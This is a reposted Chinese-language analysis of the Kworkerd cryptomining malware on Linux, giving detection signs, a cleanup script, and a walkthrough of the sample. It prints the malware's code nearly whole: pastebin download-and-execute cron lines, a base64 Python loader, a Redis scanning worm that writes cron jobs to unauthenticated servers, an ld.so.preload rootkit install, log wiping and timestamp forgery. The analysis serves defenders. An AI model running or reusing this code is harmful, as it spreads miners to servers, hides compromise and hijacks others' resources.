Kworkerd惡意挖礦分析

轉自：https://www.360zhijia.com/anquan/417114.html

 

0x01 快速特征排查

TOP顯示CPU占用高，但是沒有高占用的進程

 

存在與未知服務器13531端口建立的TCP連接

 

文件/etc/ld.so.preload中指向了/usr/local/lib/libntp.so

 

存在可疑執行base64編碼的python進程

 

 

0x02 快速清除

1. #!/bin/bash
2. ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9
4. echo "" > /etc/cron.d/root
5. echo "" > /etc/cron.d/system
6. echo "" > /var/spool/cron/root
7. echo "" > /var/spool/cron/crontabs/root
8. rm -rf /etc/cron.hourly/oanacron
9. rm -rf /etc/cron.daily/oanacron
10. rm -rf /etc/cron.monthly/oanacron
12. rm -rf /bin/httpdns
13. sed -i '$d' /etc/crontab
15. sed -i '$d' /etc/ld.so.preload
16. rm -rf /usr/local/lib/libntp.so
18. ps aux|grep kworkerds|grep -v color|awk '{print $2}'|xargs kill -9
19. rm -rf /tmp/.tmph
20. rm -rf /bin/kworkerds
21. rm -rf /tmp/kworkerds
22. rm -rf /usr/sbin/kworkerds
23. rm -rf /etc/init.d/kworker
24. chkconfig --del kworker

 

0x03 細節行為分析

搜索引擎查找相關問題，也有不少人碰到，比如：

 

首先，CPU占用率100%，但是top命令查看，無法看到高占用��程，懷疑植入了rootkit。
查看crontab的內容，已經被寫入了一個定時任務，每半小時左右會從pastebin上下載腳本並且執行（pastebin是任意上傳分享的平台，攻擊者借此實現匿名）
https://pastebin.com/raw/xbY7p5Tb
拿到xbY7p5Tb腳本內容如下：

 

1. (curl -fsSL https://pastebin.com/raw/Gw7mywhC || wget -q-O- https://pastebin.com/raw/Gw7mywhC)|base64 -d |/bin/bash

腳本中再次下載了另一個腳本，並且對腳本內容進行base64解碼后執行:

 

腳本主要邏輯提取內容如下（省略了一堆調用的函數）：

1. update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
2. if [ ${update}x = "update"x ];then
3. echocron
4. else
5. if [ ! -f "/tmp/.tmph" ]; then
6. rm -rf /tmp/.tmpg
7. python
8. fi
9. kills
10. downloadrun
11. echocron
12. system
13. top
14. sleep 10
15. port=$(netstat -anp | grep :13531 | wc -l)
16. if [ ${port} -eq 0 ];then
17. downloadrunxm
18. fi
19. echo 0>/var/spool/mail/root
20. echo 0>/var/log/wtmp
21. echo 0>/var/log/secure
22. echo 0>/var/log/cron
23. fi
24. #
25. #
26. #

該惡意腳本首先檢查更新，如果有更新，執行echocron進行更新操作
https://pastebin.com/raw/TzBeq3AM

 

 

接着檢查了/tmp/.tmph文件是否存在，如果存在則刪除，並且執行python函數
名為Python的函數在腳本中為：

1. function python() {
2. nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
3. touch /tmp/.tmph

其中執行的python代碼經過了base64編碼，解碼后內容為：

1. #coding: utf-8
2. import urllib
3. import base64
5. d= 'https://pastebin.com/raw/nYBpuAxT'
6. try:
7. page=base64.b64decode(urllib.urlopen(d).read())
8. exec(page)
9. except:
10. pass

這段python代碼又從https://pastebin.com/raw/nYBpuAxT讀取了內容，並且進行了執行：

 

再次base64解碼后的最終代碼內容如下，是一個針對redis的掃描攻擊腳本，用於擴散感染：

1. #! /usr/bin/env python
2. #coding: utf-8
4. import threading
5. import socket
6. from re import findall
7. import httplib
9. IP_LIST = []
11. class scanner(threading.Thread):
12. tlist = []
13. maxthreads = 20
14. evnt = threading.Event()
15. lck = threading.Lock()
17. def __init__(self,host):
18. threading.Thread.__init__(self)
19. self.host = host
20. def run(self):
21. try:
22. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23. s.settimeout(2)
24. s.connect((self.host, 6379))
25. s.send('set backup1 "\n\n\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
26. s.send('set backup2 "\n\n\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
27. s.send('config set dir /var/spool/cronrn')
28. s.send('config set dbfilename rootrn')
29. s.send('savern')
30. s.close()
31. except Exception as e:
32. pass
33. scanner.lck.acquire()
34. scanner.tlist.remove(self)
35. if len(scanner.tlist) < scanner.maxthreads:
36. scanner.evnt.set()
37. scanner.evnt.clear()
38. scanner.lck.release()
40. def newthread(host):
41. scanner.lck.acquire()
42. sc = scanner(host)
43. scanner.tlist.append(sc)
44. scanner.lck.release()
45. sc.start()
47. newthread = staticmethod(newthread)
49. def get_ip_list():
50. try:
51. url = 'ident.me'
52. conn = httplib.HTTPConnection(url, port=80, timeout=10)
53. req = conn.request(method='GET', url='/', )
54. result = conn.getresponse()
55. ip2 = result.read()
56. ips2 = findall(r'd+.d+.', ip2)[0][:-2]
57. for u in range(0, 10):
58. ip_list1 = (ips2 + (str(u)) +'.')
59. for i in range(0, 256):
60. ip_list2 = (ip_list1 + (str(i)))
61. for g in range(0, 256):
62. IP_LIST.append(ip_list2 + '.' + (str(g)))
63. except Exception:
64. pass
66. def runPortscan():
67. get_ip_list()
68. for host in IP_LIST:
69. scanner.lck.acquire()
70. if len(scanner.tlist) >= scanner.maxthreads:
71. scanner.lck.release()
72. scanner.evnt.wait()
73. else:
74. scanner.lck.release()
75. scanner.newthread(host)
76. for t in scanner.tlist:
77. t.join()
79. if __name__ == "__main__":
80. runPortscan()

上述攻擊腳本中，關鍵代碼如下，通過掃描redis的6379端口，如果沒有做訪問驗證，則直接進行遠程命令執行進行感染。

1. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
2. s.settimeout(2)
3. s.connect((self.host, 6379))
4. s.send('set backup1 "\n\n\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
5. s.send('set backup2 "\n\n\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"rn')
6. s.send('config set dir /var/spool/cronrn')
7. s.send('config set dbfilename rootrn')
8. s.send('savern')
9. s.close()

主邏輯中的python函數執行完畢，接着執行主要邏輯代碼：

1. if [ ! -f "/tmp/.tmph" ]; then
2. rm -rf /tmp/.tmpg
3. python
4. fi
5. kills
6. downloadrun
7. echocron
8. system
9. top
10. sleep 10
11. port=$(netstat -anp | grep :13531 | wc -l)
12. if [ ${port} -eq 0 ];then
13. downloadrunxm
14. fi
15. echo 0>/var/spool/mail/root
16. echo 0>/var/log/wtmp
17. echo 0>/var/log/secure
18. echo 0>/var/log/cron

kills函數主要是檢查是否有其他挖礦等程序在運行，直接干掉，這里不做重點代碼內容展示

downloadrun函數的內容如下，從thyrsi.com中下載了一個偽裝為jpg的文件，保存為/tmp下的kworkerds並執行：

1. function downloadrun() {
2. ps=$(netstat -anp | grep :13531 | wc -l)
3. if [ ${ps} -eq 0 ];then
4. if [ ! -f "/tmp/kworkerds" ]; then
5. curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
6. if [ ! -f "/tmp/kworkerds" ]; then
7. wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
8. fi
9. nohup /tmp/kworkerds >/dev/null 2>&1 &
10. else
11. nohup /tmp/kworkerds >/dev/null 2>&1 &
12. fi
13. fi
14. }

Kworkerds文件是挖礦本體程序，拿到后扔進virustotal檢查結果：

 

 

 

接着執行echocron函數，該函數在各個定時任務文件中寫入下載惡意腳本並執行的任務，並且清除相關日志，這樣加大了清理的難度:

 

1. echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /etc/cron.d/root
2. echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /etc/cron.d/system
3. echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /var/spool/cron/root
4. mkdir -p /var/spool/cron/crontabs
5. echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|shn##" > /var/spool/cron/crontabs/root
6. mkdir -p /etc/cron.hourly
7. curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
8. if [ ! -f "/etc/cron.hourly/oanacron" ]; then
9. wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
10. fi
11. mkdir -p /etc/cron.daily
12. curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
13. if [ ! -f "/etc/cron.daily/oanacron" ]; then
14. wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
15. fi
16. mkdir -p /etc/cron.monthly
17. curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
18. if [ ! -f "/etc/cron.monthly/oanacron" ]; then
19. wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
20. fi
21. touch -acmr /bin/sh /var/spool/cron/root
22. touch -acmr /bin/sh /var/spool/cron/crontabs/root
23. touch -acmr /bin/sh /etc/cron.d/system
24. touch -acmr /bin/sh /etc/cron.d/root
25. touch -acmr /bin/sh /etc/cron.hourly/oanacron
26. touch -acmr /bin/sh /etc/cron.daily/oanacron
27. touch -acmr /bin/sh /etc/cron.monthly/oanacron

之后執行system和top函數,system��數中下載了一個惡意的腳本文件放置在/bin目錄下，並且寫入定時任務。

1. function system() {
2. if [ ! -f "/bin/httpdns" ]; then
3. curl -fsSL https://pastebin.com/raw/Fj2YdETv -o /bin/httpdns && chmod 755 /bin/httpdns
4. if [ ! -f "/bin/httpdns" ]; then
5. wget https://pastebin.com/raw/Fj2YdETv -O /bin/httpdns && chmod 755 /bin/httpdns
6. fi
7. if [ ! -f "/etc/crontab" ]; then
8. echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
9. else
10. sed -i '$d' /etc/crontab && echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
11. fi
12. fi
13. }

其中httpdns的內容為:

 

改腳本再次下載了一個腳本進行執行，腳本內容與上面主腳本內容類似（刪減了kills system top幾個函數；增加了init函數，即下載執行挖礦程序）：

 

Top函數主要進行了rootkit的行為。
函數將偽裝為jpg的惡意鏈接庫文件下載，首先放置在/usr/local/lib目錄下，之后替換/etc/ld.so.preload文件，通過預加載劫持linux系統函數，使得top、ps等命令無法找到挖礦進程；

 

關於preload預加載惡意動態鏈接相關，可以閱讀此文參考：

https://blog.csdn.net/aganlengzi/article/details/21824553

最后通過touch–acmr命令，掩蓋剛剛執行的操作（使得文件存取時間和變動時間與/bin/sh的日期一致，避免被懷疑）

1. function top() {
2. mkdir -p /usr/local/lib/
3. if [ ! -f "/usr/local/lib/libntp.so" ]; then
4. curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
5. if [ ! -f "/usr/local/lib/libntp.so" ]; then
6. wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
7. fi
8. fi
9. if [ ! -f "/etc/ld.so.preload" ]; then
10. echo /usr/local/lib/libntp.so > /etc/ld.so.preload
11. else
12. sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
13. fi
14. touch -acmr /bin/sh /etc/ld.so.preload
15. touch -acmr /bin/sh /usr/local/lib/libntp.so

執行上述函數后，主腳本sleep10秒，判斷是否與13531端口建立了連接，如果沒有，則執行downloadrunxm函數（之后可以看到，13531是與連接的礦池端口）。
Downloadrunxm函數中，同樣下載了一個偽裝的jpg文件，另存為/bin/config.json，又再次下載了kworkerds並且執行：

1. function downloadrunxm() {
2. pm=$(netstat -anp | grep :13531 | wc -l)
3. if [ ${pm} -eq 0 ];then
4. if [ ! -f "/bin/config.json" ]; then
5. curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod 777 /bin/config.json
6. if [ ! -f "/bin/config.json" ]; then
7. wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod 777 /bin/config.json
8. fi
9. fi
10. if [ ! -f "/bin/kworkerds" ]; then
11. curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod 777 /bin/kworkerds
12. if [ ! -f "/bin/kworkerds" ]; then
13. wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod 777 /bin/kworkerds
14. fi
15. nohup /bin/kworkerds >/dev/null 2>&1 &
16. else
17. nohup /bin/kworkerds >/dev/null 2>&1 &
18. fi
19. fi
20. }

拿到的config.json的內容如下：

1. {
2. "algo": "cryptonight",
3. "api": {
4. "port": 0,
5. "access-token": null,
6. "worker-id": null,
7. "ipv6": false,
8. "restricted": true
9. },
10. "av": 0,
11. "background": false,
12. "colors": true,
13. "cpu-affinity": null,
14. "cpu-priority": null,
15. "donate-level": 0,
16. "huge-pages": true,
17. "hw-aes": null,
18. "log-file": null,
19. "max-cpu-usage": 100,
20. "pools": [
21. {
22. "url": "stratum+tcp://xmr.f2pool.com:13531",
23. "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
24. "pass": "x",
25. "rig-id": null,
26. "nicehash": false,
27. "keepalive": false,
28. "variant": 1
29. }
30. ],
31. "print-time": 60,
32. "retries": 5,
33. "retry-pause": 5,
34. "safe": false,
35. "threads": null,
36. "user-agent": null,
37. "watch": false
38. }

連接的礦池為國內的f2pool.com魚池：

 

 

0x04 樣本收集分享

搜集遇到的惡意挖礦repo：
https://github.com/MRdoulestar/whatMiner